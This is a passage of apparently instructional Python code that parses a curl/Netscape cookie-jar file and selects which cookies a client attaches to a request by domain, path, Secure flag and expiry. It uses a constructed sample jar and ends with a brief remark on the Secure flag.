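            continue                          # comment or blank line
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"expected 7 tab-separated fields: {line!r}")
        domain, subs, path, secure, expires, name, value = fields
        cookies.append(Cookie(domain, subs == "TRUE", path, secure == "TRUE",
                              int(expires), name, value, http_only))
    return cookies


def domain_matches(cookie: Cookie, host: str) -> bool:
    d = cookie.domain.lstrip(".")
    return host == d or (cookie.include_subdomains and host.endswith("." + d))


def cookie_header_for(cookies, host: str, path: str, secure: bool, now: int) -> str:
    """Select the cookies a client would attach to a request and join them.

    Applies the same rules a browser or curl does: domain match, path
    prefix, Secure only over HTTPS, and not past expiry.
    """
    chosen = [c for c in cookies
              if domain_matches(c, host)
              and path.startswith(c.path)
              and (secure or not c.secure)
              and (c.expires == 0 or c.expires > now)]
    # Longer (more specific) paths go first, as RFC 6265 requires.
    chosen.sort(key=lambda c: len(c.path), reverse=True)
    return "; ".join(f"{c.name}={c.value}" for c in chosen)


# Constructed cookie-jar contents: a session cookie like card 34's, a
# long-lived site-wide cookie, and an expired one scoped to /admin.
SAMPLE_JAR = (
    "# Netscape HTTP Cookie File\n"
    "# This file was generated by libcurl! Edit at your own risk.\n"
    "\n"
    "#HttpOnly_posthere.io\tFALSE\t/\tTRUE\t0\tSESSID\t8toks\n"
    ".example.com\tTRUE\t/\tFALSE\t1893456000\ttheme\tdark\n"
    "www.example.com\tFALSE\t/admin\tFALSE\t1000000\told\t1\n"
)

if __name__ == "__main__":
    jar = parse_cookie_jar(SAMPLE_JAR)
    for c in jar:
        print(c)
    print(cookie_header_for(jar, "posthere.io", "/f260", secure=True, now=1_600_000_000))
    print(repr(cookie_header_for(jar, "posthere.io", "/f260", secure=False, now=1_600_000_000)))
```

Note that the Secure flag is the only thing keeping SESSID off a plain-HTTP request in the second call; a jar entry with FALSE in that column would be replayed in the clear.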